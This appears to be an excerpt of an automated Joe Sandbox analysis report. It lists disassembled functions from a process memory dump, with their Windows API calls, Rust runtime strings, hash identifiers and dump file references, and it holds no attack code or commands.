                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: \u${$}
                                                                                                                                                                • API String ID: 0-1393841519
                                                                                                                                                                • Opcode ID: 5ab810624c0d6e13f9d8817bee09f5c9b25ad35cace7156b4c0a4de7e6ec4ac2
                                                                                                                                                                • Instruction ID: bd0c54d78a98530898ed9607a36c4999f9bf2afbb537dab644ea4dcdc5f0433a
                                                                                                                                                                • Opcode Fuzzy Hash: 5ab810624c0d6e13f9d8817bee09f5c9b25ad35cace7156b4c0a4de7e6ec4ac2
                                                                                                                                                                • Instruction Fuzzy Hash: 3A913892A1D7C48FC7034778482516A7F719E67208B0E49DFD0D2DF6E3E1298A09DBB2
                                                                                                                                                                Function 6C8DE480 Relevance: 2.9, Strings: 2, Instructions: 381COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                • UNC\, xrefs: 6C8DE824
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C8DE86D, 6C8DE8DE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$UNC\
                                                                                                                                                                • API String ID: 0-3763929566
                                                                                                                                                                • Opcode ID: 0ed4fcd4a555c998cc5b6f301c6047c4bdef1514acf29abcb6d154eac0fb0436
                                                                                                                                                                • Instruction ID: 278770e4e0978d13b9edce272091862c10e7fdad08705b20929491b02734877c
                                                                                                                                                                • Opcode Fuzzy Hash: 0ed4fcd4a555c998cc5b6f301c6047c4bdef1514acf29abcb6d154eac0fb0436
                                                                                                                                                                • Instruction Fuzzy Hash: A8E12B31D0D7A04AD3218A2985C0225FBE39FC7318F6ACB6AE4F42B696D3759845C7D1
                                                                                                                                                                Function 6C904D50 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(6C8E01D5,00000000,?,6C8DC172,?,6C8DA0EC), ref: 6C904D59
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,6C8DC172,?,6C8DA0EC), ref: 6C904D6B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                • Opcode ID: 1010dddcce1704d39650dec54568b9968835b3e04c109aac84c568056816c51d
                                                                                                                                                                • Instruction ID: 98b59916766009a8d35ce999cae345b0f4565de5b239496cf127e73fd6356685
                                                                                                                                                                • Opcode Fuzzy Hash: 1010dddcce1704d39650dec54568b9968835b3e04c109aac84c568056816c51d
                                                                                                                                                                • Instruction Fuzzy Hash: DBD05E72784224A79B201BBFB8088977BBCEBC65B2310043FFA0CC3900EB25C801C6B0
                                                                                                                                                                Function 6C903AF1 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6C903AEC,?,?,00000008,?,?,6C9036EF,00000000), ref: 6C903D1E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                • Opcode ID: a3352e297ac7bcda3b341ac6b587a5272ba69b66b2c6d8276fd0140383af9d6d
                                                                                                                                                                • Instruction ID: d73c299894b53a60ba992047a5692b5c84b764de37cd1bca260453620a5350fc
                                                                                                                                                                • Opcode Fuzzy Hash: a3352e297ac7bcda3b341ac6b587a5272ba69b66b2c6d8276fd0140383af9d6d
                                                                                                                                                                • Instruction Fuzzy Hash: F2B12836610609DFD705CF28C486B557BE0FF45368F25869CE8A9CF6A1C335E992CB40
                                                                                                                                                                Function 6C8F141F Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C8F1435
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                • Opcode ID: bbd3ebc71d836da8833408abc34a6c9201537b0d1a94fd145e12a02c657aca11
                                                                                                                                                                • Instruction ID: cab2260f45f9db578496cd288c540e6e1ee0e9cc448fa7637cbf53c0c2bab8fa
                                                                                                                                                                • Opcode Fuzzy Hash: bbd3ebc71d836da8833408abc34a6c9201537b0d1a94fd145e12a02c657aca11
                                                                                                                                                                • Instruction Fuzzy Hash: 89519EB1B152058FEB25CFA5C98179EB7F5FB49354F20896AC42AEB640D374D902CF50
                                                                                                                                                                Function 6C8FB0E1 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e8425ef3308fbbb9a973039eb5b6bec761b0a40c868a224be97a5b16da31eef9
                                                                                                                                                                • Instruction ID: 75eee9b9f18e43bbc2bcb6a496cacba7b5ef36247c1858cd393f0b4da54ee1a9
                                                                                                                                                                • Opcode Fuzzy Hash: e8425ef3308fbbb9a973039eb5b6bec761b0a40c868a224be97a5b16da31eef9
                                                                                                                                                                • Instruction Fuzzy Hash: 9C41B4B5904219AFDB20DF69CD88AEABBB9EF45344F1446EDE429D3200DB349E858F10
                                                                                                                                                                Function 6C8F6CC1 Relevance: 1.6, Strings: 1, Instructions: 333COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                • Opcode ID: de6b54a1e85419852e6e9e48d7ca94fe5ef93a8ec322f090dd9d193eedfe8e01
                                                                                                                                                                • Instruction ID: f0bf7b24f09ff5c721f00e45858c718b25f2d5e1945d1d5e5b1c07dd5e0b4e44
                                                                                                                                                                • Opcode Fuzzy Hash: de6b54a1e85419852e6e9e48d7ca94fe5ef93a8ec322f090dd9d193eedfe8e01
                                                                                                                                                                • Instruction Fuzzy Hash: D0C1C03150464A8FEB31DE68C7816AABBB1EF46398F204F19D472D7E51C732A947CB60
                                                                                                                                                                Function 6C8D8D40 Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Startup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 724789610-0
                                                                                                                                                                • Opcode ID: 8ac584019f3be98e7fa57f8b13d3eac3f3e20a9660b7cc1ee460636c1a4ade97
                                                                                                                                                                • Instruction ID: f4634984357183e73c77445d79f6b6493b82ec47cdcbb136b20ceaaf26da0b52
                                                                                                                                                                • Opcode Fuzzy Hash: 8ac584019f3be98e7fa57f8b13d3eac3f3e20a9660b7cc1ee460636c1a4ade97
                                                                                                                                                                • Instruction Fuzzy Hash: E921D370B007049FE7208F54D804BC67BF4AF5A709F10485DEA98ABB81E3B4F5448BD1
                                                                                                                                                                Function 02648273 Relevance: .7, Instructions: 730COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9e9605cc20d5a432bb4b98ed333ad3e91973b5d32c767189beb935d7d5ee4da1
                                                                                                                                                                • Instruction ID: 4be430ae873373efe0fff15a2b6c46cb7c1a2a89f1fa3e31600bdcf4338cd7ec
                                                                                                                                                                • Opcode Fuzzy Hash: 9e9605cc20d5a432bb4b98ed333ad3e91973b5d32c767189beb935d7d5ee4da1
                                                                                                                                                                • Instruction Fuzzy Hash: 46427971608301AFDB64DF28CC44B6BBBE9EF88714F18492DF9959B241EB70E941CB91
                                                                                                                                                                Function 6C8E87C0 Relevance: .6, Instructions: 555COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 998833bc0e77813f16b864cde4f2b691253322b52f9f727ef907403d7a5a1060
                                                                                                                                                                • Instruction ID: d06b559936287624344ca6692bfb7d1ddf5178a5e36d267d12c3c24207d1b188
                                                                                                                                                                • Opcode Fuzzy Hash: 998833bc0e77813f16b864cde4f2b691253322b52f9f727ef907403d7a5a1060
                                                                                                                                                                • Instruction Fuzzy Hash: 90223EB1E0521A8FCB14CF5DC5905AEFBF2FF8E314F298A6AD415AB750D331A9418B90
                                                                                                                                                                Function 6C8EBDA0 Relevance: .5, Instructions: 495COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: dea14903867f46ae59f47aa593ed50eb4510e5639d67bd95a1c20e868480f929
                                                                                                                                                                • Instruction ID: 15f9bcf9b3dd475ce1b8f78f114381c7cb6a424308d324e5a93aaf5954062556
                                                                                                                                                                • Opcode Fuzzy Hash: dea14903867f46ae59f47aa593ed50eb4510e5639d67bd95a1c20e868480f929
                                                                                                                                                                • Instruction Fuzzy Hash: 5102E571E0431A8FC711CE79C5802AFBAB2AFDB354F158B2AE815B7B41D771A9418B90
                                                                                                                                                                Function 6C8E2570 Relevance: .4, Instructions: 399COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 62bb1aa7df9dc6a7a0fefcaf6cec0dd6a71d8d4cd5bcddaf6e7c1a3e5ec520d7
                                                                                                                                                                • Instruction ID: 5c891d491ca8868272e9e915b52e9b5ae2e10c0943097897c525e3b4f2b8d777
                                                                                                                                                                • Opcode Fuzzy Hash: 62bb1aa7df9dc6a7a0fefcaf6cec0dd6a71d8d4cd5bcddaf6e7c1a3e5ec520d7
                                                                                                                                                                • Instruction Fuzzy Hash: 87E13272E0022A8BDB24CF98DD84BEDB7B2BB8E314F154639D855B7781D7389D018B94
                                                                                                                                                                Function 6C8D7F41 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bba9dec625cb0f9bf0eb545e6f4aaa555b8dc0173d99eae7f9eee75350d4a520
                                                                                                                                                                • Instruction ID: 4055eb2e6265793e8e5967bbfb8ed41696bfdaa1cc984755f066a9545e6879c1
                                                                                                                                                                • Opcode Fuzzy Hash: bba9dec625cb0f9bf0eb545e6f4aaa555b8dc0173d99eae7f9eee75350d4a520
                                                                                                                                                                • Instruction Fuzzy Hash: B2C15971E083988FCB22CB75C5903DEBFB2AF86308F1E999FC08567642D634A945C791
                                                                                                                                                                Function 6C8EB8F0 Relevance: .3, Instructions: 279COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3d7a229337ff36c0e7cc01a7b05735500a52575070c16aca7c53734be48c3eda
                                                                                                                                                                • Instruction ID: 523e5a4bd388dade9c2e00d6322078b99d5b23ffcce15b0ce30f1b5818971dbf
                                                                                                                                                                • Opcode Fuzzy Hash: 3d7a229337ff36c0e7cc01a7b05735500a52575070c16aca7c53734be48c3eda
                                                                                                                                                                • Instruction Fuzzy Hash: EEA17F76E2571A4BDB228639C8813B9F661DFE7284F16C73FEC6077A92EB2056414348
                                                                                                                                                                Function 6C8E3960 Relevance: .3, Instructions: 269COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0cf1e291e1b458b11f30703b63a8bbab841e916e03ba355b78b4faa17d23c350
                                                                                                                                                                • Instruction ID: e6d2742ae5035bcca479e9fdc6e565804e4fb4659a204b8b3152e98162779e32
                                                                                                                                                                • Opcode Fuzzy Hash: 0cf1e291e1b458b11f30703b63a8bbab841e916e03ba355b78b4faa17d23c350
                                                                                                                                                                • Instruction Fuzzy Hash: E6911571B407159FDB20CE69CA80BAAB3A1BF4B708F194D78CC14ABBA2D331DD458752
                                                                                                                                                                Function 6C8D8FA0 Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 322libraryloadersynchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6C8D46C0: SetLastError.KERNEL32(00000000), ref: 6C8D4783
                                                                                                                                                                  • Part of subcall function 6C8D46C0: GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6C8D478B
                                                                                                                                                                  • Part of subcall function 6C8D46C0: GetLastError.KERNEL32 ref: 6C8D4797
                                                                                                                                                                  • Part of subcall function 6C8D46C0: GetLastError.KERNEL32 ref: 6C8D47A9
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 6C8D90DE
                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 6C8D90E7
                                                                                                                                                                • RtlCaptureContext.KERNEL32(?), ref: 6C8D9107
                                                                                                                                                                • GetProcAddress.KERNEL32(SymFunctionTableAccess64), ref: 6C8D9149
                                                                                                                                                                • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6C8D9173
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6C8D9188
                                                                                                                                                                • GetProcAddress.KERNEL32(StackWalkEx), ref: 6C8D91AB
                                                                                                                                                                • ReleaseMutex.KERNEL32(?), ref: 6C8D92D1
                                                                                                                                                                • GetProcAddress.KERNEL32(StackWalk64), ref: 6C8D9404
                                                                                                                                                                Strings
                                                                                                                                                                • SymGetModuleBase64, xrefs: 6C8D9168
                                                                                                                                                                • stack backtrace:, xrefs: 6C8D9063
                                                                                                                                                                • StackWalk64, xrefs: 6C8D93F9
                                                                                                                                                                • StackWalkEx, xrefs: 6C8D91A0
